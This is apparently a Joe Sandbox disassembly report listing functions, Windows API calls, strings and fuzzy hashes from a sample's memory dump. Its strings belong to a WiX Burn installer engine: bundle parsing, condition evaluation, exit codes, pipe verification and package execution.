Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,009BD558,?,?,?), ref: 009BCEC7
GetLastError.KERNEL32(?,?,009BD558,?,?,?), ref: 009BCED4
ReleaseMutex.KERNEL32(?), ref: 009BD13C

Strings

Failed to MapViewOfFile for %ls., xrefs: 009BD070
failed to allocate memory for mutex name, xrefs: 009BCF89
%ls_mutex, xrefs: 009BCF75
%ls_send, xrefs: 009BCF06
Failed to create mutex: %ls, xrefs: 009BCFD6
Failed to allocate memory for NetFxChainer struct., xrefs: 009BCEAD
failed to copy event name to shared memory structure., xrefs: 009BD09A
Failed to memory map cabinet file: %ls, xrefs: 009BD028
Failed to create event: %ls, xrefs: 009BCF67
NetFxChainer.cpp, xrefs: 009BCEA3, 009BCEF5, 009BCF5A, 009BCFC9, 009BD01B, 009BD063
failed to allocate memory for event name, xrefs: 009BCF1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: f22687b7b1fbc3dcaf0e5177c5e20a3f399312d384c2900e9609ea5dfa40a8bb
Instruction ID: 3b3acdfb295c7c9b87f7bbcd7dcc835c53fa9e6791ee7888c8b7efcceed121d9
Opcode Fuzzy Hash: f22687b7b1fbc3dcaf0e5177c5e20a3f399312d384c2900e9609ea5dfa40a8bb
Instruction Fuzzy Hash: 64813A76A86326FBC7219F698D09FAA7BA8BF44770F014155FE14AB241E770DC008BE0

Function 0099EA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 009D32F3: VariantInit.OLEAUT32(?), ref: 009D3309
Part of subcall function 009D32F3: SysAllocString.OLEAUT32(?), ref: 009D3325
Part of subcall function 009D32F3: VariantClear.OLEAUT32(?), ref: 009D33AC
Part of subcall function 009D32F3: SysFreeString.OLEAUT32(00000000), ref: 009D33B7

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,009DCA9C,?,?,Action,?,?,?,00000000,00995445), ref: 0099EB13
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0099EB5D

Strings

Failed to get next RelatedBundle element., xrefs: 0099EC70
cabinet.dll, xrefs: 0099EBBA
Failed to get RelatedBundle nodes, xrefs: 0099EA72
Patch, xrefs: 0099EBDD
Failed to get @Id., xrefs: 0099EC62
Failed to resize Addon code array in registration, xrefs: 0099EC3C
version.dll, xrefs: 0099EB70
RelatedBundle, xrefs: 0099EA50
Failed to get @Action., xrefs: 0099EC69
Detect, xrefs: 0099EB04
Action, xrefs: 0099EAD0
comres.dll, xrefs: 0099EB26
Addon, xrefs: 0099EB9A
Failed to get RelatedBundle element count., xrefs: 0099EA97
Failed to resize Detect code array in registration, xrefs: 0099EC2E
Upgrade, xrefs: 0099EB50
Failed to resize Patch code array in registration, xrefs: 0099EC43
Failed to resize Upgrade code array in registration, xrefs: 0099EC35
Invalid value for @Action: %ls, xrefs: 0099EC52

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: a9ed2e03eb03591fcf9682a179a17df4108cbe1a6240c0c91f6a3552571afd7a
Instruction ID: f9e5d684fb5e9ce77f3c4d5cfe1a27f1e510dbac0626fb85c76a3b560d04b5ed
Opcode Fuzzy Hash: a9ed2e03eb03591fcf9682a179a17df4108cbe1a6240c0c91f6a3552571afd7a
Instruction Fuzzy Hash: 9C71BF31A4561ABBCF11CE98C941EAEB7B8FB44724F204259F991A72C1E771EE41CB90

Function 009A46DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,009A4BF5,009DB4E8,?,feclient.dll,00000000,?,?), ref: 009A46F3
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,009A4BF5,009DB4E8,?,feclient.dll,00000000,?,?), ref: 009A4714
GetLastError.KERNEL32(?,009A4BF5,009DB4E8,?,feclient.dll,00000000,?,?), ref: 009A471A
ReadFile.KERNEL32(feclient.dll,00000000,009DB518,?,00000000,00000000,009DB519,?,009A4BF5,009DB4E8,?,feclient.dll,00000000,?,?), ref: 009A47A8
GetLastError.KERNEL32(?,009A4BF5,009DB4E8,?,feclient.dll,00000000,?,?), ref: 009A47AE

Strings

msasn1.dll, xrefs: 009A482B
feclient.dll, xrefs: 009A46E2, 009A4712, 009A4713, 009A47A7, 009A482C, 009A4882
pipe.cpp, xrefs: 009A473E, 009A4769, 009A47D2, 009A480A, 009A4857, 009A48B1, 009A48F1
Verification secret from parent does not match., xrefs: 009A4816
Failed to read verification process id from parent pipe., xrefs: 009A4861
Failed to read size of verification secret from parent pipe., xrefs: 009A4748
Verification process id from parent does not match., xrefs: 009A48FD
Verification secret from parent is too big., xrefs: 009A4775
Failed to inform parent process that child is running., xrefs: 009A48BB
Failed to allocate buffer for verification secret., xrefs: 009A4791
Failed to read verification secret from parent pipe., xrefs: 009A47DC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 1233551569-452622383
Opcode ID: 61aa8e2cfe43909b46a9ee84687722a956c97419f0f491a32b9b063e232f8a51
Instruction ID: 3dcc700ebe5ad4946c2a4a09fb4cca2c5a30a39f77682618f54772513e214b64
Opcode Fuzzy Hash: 61aa8e2cfe43909b46a9ee84687722a956c97419f0f491a32b9b063e232f8a51
Instruction Fuzzy Hash: E2511B36D84265B7DF219BDA9C42F7F776CAB86B10F120125FE10BB280D7B89D0096E1

Function 009B27FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

Protocol, xrefs: 009B28C3
Failed to parse exit codes., xrefs: 009B290C
Failed to get @RepairArguments., xrefs: 009B288B
UninstallArguments, xrefs: 009B2858
Failed to get @UninstallArguments., xrefs: 009B2869
Failed to get @Repairable., xrefs: 009B28B5
Failed to get @InstallArguments., xrefs: 009B2847
Failed to get @Protocol., xrefs: 009B2974
Repairable, xrefs: 009B289C
none, xrefs: 009B2936
DetectCondition, xrefs: 009B2814
InstallArguments, xrefs: 009B2836
netfx4, xrefs: 009B2915
Failed to parse command lines., xrefs: 009B2988
Failed to get @DetectCondition., xrefs: 009B2825
burn, xrefs: 009B28E0
RepairArguments, xrefs: 009B287A
Invalid protocol type: %ls, xrefs: 009B295C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: f038bd49a57a7413c03cc400c4ca65980822356d08f3f0d73136868b77c679b2
Instruction ID: ea3dc9eff91d5af7c73176d8a6a8168bceafd224c2d23f444d5bed26e58dc6d0
Opcode Fuzzy Hash: f038bd49a57a7413c03cc400c4ca65980822356d08f3f0d73136868b77c679b2
Instruction Fuzzy Hash: 35413D71E88766B6CB2357658E06FEBB218DB50B35F214722F934B63D5C764BD0082E1

Function 00998F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,56009DDB,00000001,?,00999946,?,00000000,00000000,?,?,0099992E,?,?,00000000,?), ref: 00998FB2

Strings

Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00999408
-, xrefs: 00999118
Failed to set symbol value., xrefs: 00999060
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 009991DE
NOT, xrefs: 009992DB
condition.cpp, xrefs: 00999084, 0099914E, 009991CA, 0099922E, 0099936C, 009993B0, 009993F4
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00999098
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00999380
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00999242
AND, xrefs: 009992BC
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00999162
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 009993C4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: StringType
String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3594736606
Opcode ID: 17eb839d3d4c6d8afe8d9fcc7dda3f85f2fde5e094e9c971f5c681516d5533cc
Instruction ID: 16899a56044b5dfbdcbc455e026a3326ba0ed5d835e9be8c8382e57ed1133127
Opcode Fuzzy Hash: 17eb839d3d4c6d8afe8d9fcc7dda3f85f2fde5e094e9c971f5c681516d5533cc
Instruction Fuzzy Hash: B6F10271644211FFDF25CF9CC889BBA7BA8FB04704F10854EF9159A694C3BADA91CB90

Function 009B1BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 009B1CB8
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 009B1CD6

Strings

Failed to parse @Code value: %ls, xrefs: 009B1D91
Type, xrefs: 009B1C90
Failed to get @Type., xrefs: 009B1DB7
Failed to get @Code., xrefs: 009B1D98
Invalid exit code type: %ls, xrefs: 009B1DA7
Code, xrefs: 009B1D25
Failed to allocate memory for exit code structs., xrefs: 009B1C43
Failed to get exit code node count., xrefs: 009B1C03
Failed to get next node., xrefs: 009B1DBE
error, xrefs: 009B1CC9
ExitCode, xrefs: 009B1BBF
success, xrefs: 009B1CA9
forceReboot, xrefs: 009B1D03
exeengine.cpp, xrefs: 009B1C39
Failed to select exit code nodes., xrefs: 009B1BDE
scheduleReboot, xrefs: 009B1CE5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: 9d002f5753e788daa3deb8c49b9636b4ee1dd80033fb7da5236c7881cfe2d384
Instruction ID: 72bb7763dbaf90c9ccff9cb3860dcf3daaf03efb1e0382417427783389a62451
Opcode Fuzzy Hash: 9d002f5753e788daa3deb8c49b9636b4ee1dd80033fb7da5236c7881cfe2d384
Instruction Fuzzy Hash: 4161D331A4521AFBCB119B95CD51EEEBBA8EFC0730F604655F425AB2D0CB709E00DB90

Function 009D77F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 009D7857
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 009D787C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 009D789C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 009D78CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 009D78EB
SysFreeString.OLEAUT32(00000000), ref: 009D7916
SysFreeString.OLEAUT32(00000000), ref: 009D798D
SysFreeString.OLEAUT32(00000000), ref: 009D79D9

Strings

msasn1.dll, xrefs: 009D79C7
feclient.dll, xrefs: 009D7889
msi.dll, xrefs: 009D7975
length, xrefs: 009D788E
title, xrefs: 009D78C1
href, xrefs: 009D786E
comres.dll, xrefs: 009D78A6
rel, xrefs: 009D784A
version.dll, xrefs: 009D78FA
`5w, xrefs: 009D7916, 009D798D, 009D79D9
type, xrefs: 009D78DD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free
String ID: `5w$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-3319342121
Opcode ID: b24735fb7e4470badf09f1f65e3e9ff212bf39899a5cd543f00ad6906355b157
Instruction ID: e9898af9ae985fd5489cc27c3fd76d36892c3849dd5f0a96a43d2a536f86f49f
Opcode Fuzzy Hash: b24735fb7e4470badf09f1f65e3e9ff212bf39899a5cd543f00ad6906355b157
Instruction Fuzzy Hash: 51615172989219FBDF15DBD4CD55FAEF7B8AF04320F208666E521A7290E7309E40DB90

Function 009A6BCA Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 351synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0099D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,009A7040,000000B8,00000000,?,00000000,76C1B390), ref: 0099D4B7
Part of subcall function 0099D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0099D4C6
Part of subcall function 0099D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,009A7040,000000B8,00000000,?,00000000,76C1B390), ref: 0099D4DB

CreateThread.KERNEL32(00000000,00000000,009A57BD,?,00000000,00000000), ref: 009A6E34
GetLastError.KERNEL32(?,?,?,?,?,?,?,00994522,?,009DB500,?,00994846,?,?), ref: 009A6E43
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00994522,?,009DB500,?,00994846,?,?), ref: 009A6EA0
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 009A6F92
CloseHandle.KERNEL32(00000000), ref: 009A6F9B
CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 009A6FB5

Part of subcall function 009BBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 009BBD0A

Strings

Failed to create cache thread., xrefs: 009A6E71
crypt32.dll, xrefs: 009A6ECD, 009A6EE7, 009A6FB4
Another per-user setup is already executing., xrefs: 009A6CD8
Failed to set initial apply variables., xrefs: 009A6D02
UX aborted apply begin., xrefs: 009A6C94
Failed to elevate., xrefs: 009A6D94
Engine cannot start apply because it is busy with another action., xrefs: 009A6C28
Another per-machine setup is already executing., xrefs: 009A6DC8
core.cpp, xrefs: 009A6C8A, 009A6E67
Failed to cache engine to working directory., xrefs: 009A6D71
Failed to register bundle., xrefs: 009A6DEE
Failed while caching, aborting execution., xrefs: 009A6E98

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 2169948125-4292671789
Opcode ID: 270bf4bac19c41bad6800fe4c106606dc9ef06c45c71b6244ab80962ed2c1206
Instruction ID: 1180f9153574e920db504acc0313990aefb39d083f68c8b087c1244d2ba629bd
Opcode Fuzzy Hash: 270bf4bac19c41bad6800fe4c106606dc9ef06c45c71b6244ab80962ed2c1206
Instruction Fuzzy Hash: F9C1C072901215EFDF129F64CC85BEE3AA8EF45714F18417AFE09AE181DB749940CBE1

Function 009D8134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 009D8161
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 009D817C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 009D821F
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,009DB518,00000000), ref: 009D825E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 009D82B1
CompareStringW.KERNEL32(0000007F,00000000,009DB518,000000FF,true,000000FF), ref: 009D82CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 009D8307
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 009D844B

Strings

http://appsyndication.org/2006/appsyn, xrefs: 009D8154
version, xrefs: 009D8250, 009D82F9
upgrade, xrefs: 009D8211
exclusive, xrefs: 009D82A3
application, xrefs: 009D816E
apuputil.cpp, xrefs: 009D836E
true, xrefs: 009D82C1
enclosure, xrefs: 009D8439
type, xrefs: 009D81A7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: 9ab2996e835192e6111ba17941996728d272bf35cf4281ee918c639b5d2ab72c
Instruction ID: b49a10dc5ed96c849803676d6403151139c532ce32efb217fe473580709ddf0d
Opcode Fuzzy Hash: 9ab2996e835192e6111ba17941996728d272bf35cf4281ee918c639b5d2ab72c
Instruction Fuzzy Hash: A7B18371588306ABCB219F54CC81F5B77BAAB44734F218656FA75AB3E2DB70E841CB00

Function 009AE3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009AE2AF: LoadBitmapW.USER32(?,00000001), ref: 009AE2E5
Part of subcall function 009AE2AF: GetLastError.KERNEL32 ref: 009AE2F1

LoadCursorW.USER32(00000000,00007F00), ref: 009AE429
RegisterClassW.USER32(?), ref: 009AE43D
GetLastError.KERNEL32 ref: 009AE448
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 009AE54D
DeleteObject.GDI32(00000000), ref: 009AE55C

Strings

Failed to create window., xrefs: 009AE4DF
WixBurnSplashScreen, xrefs: 009AE436, 009AE548
Failed to load splash screen., xrefs: 009AE401
Failed to register window., xrefs: 009AE476
Unexpected return value from message pump., xrefs: 009AE537
splashscreen.cpp, xrefs: 009AE46C, 009AE4D5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 164797020-2188509422
Opcode ID: d873991189336aee7a29e38c8ac61cf9676dcd222527332fd3f2c9364057c63d
Instruction ID: 8089aea10baec7602b5a5f1667f8455b3c8cc144aad52f6ae276f6be043e8b15
Opcode Fuzzy Hash: d873991189336aee7a29e38c8ac61cf9676dcd222527332fd3f2c9364057c63d
Instruction Fuzzy Hash: 6F41B376945229FFDF119BE4DC08AAEFBB9FF09714F110126FA01B6150E7309D409B91

Function 009B9DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,009BBC85,00000001), ref: 009B9E46
GetLastError.KERNEL32(?,009BBC85,00000001), ref: 009B9FB6
GetExitCodeThread.KERNEL32(00000001,00000000,?,009BBC85,00000001), ref: 009B9FF6
GetLastError.KERNEL32(?,009BBC85,00000001), ref: 009BA000

Strings

Failed to load compatible package on per-machine package., xrefs: 009B9F5C
Invalid execute action., xrefs: 009BA056
Failed to execute MSU package., xrefs: 009B9EFB
Failed to execute compatible package action., xrefs: 009B9F73
Failed to execute MSI package., xrefs: 009B9EA6
Failed to execute package provider registration action., xrefs: 009B9F17
Failed to execute EXE package., xrefs: 009B9E7D
Cache thread exited unexpectedly., xrefs: 009BA047
apply.cpp, xrefs: 009B9FDD, 009BA027
Failed to get cache thread exit code., xrefs: 009BA031
Failed to execute dependency action., xrefs: 009B9F36
Failed to execute MSP package., xrefs: 009B9ECB
Failed to wait for cache check-point., xrefs: 009B9FE7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 38510fbfce265d5880d68caa2946f8d61d7532f236782effbf17e7c3778ed65c
Instruction ID: 1641d4bb302a440bf1a1f7b932158a24adf65c6577ebcce9b6bc3ae7ae22a4dd
Opcode Fuzzy Hash: 38510fbfce265d5880d68caa2946f8d61d7532f236782effbf17e7c3778ed65c
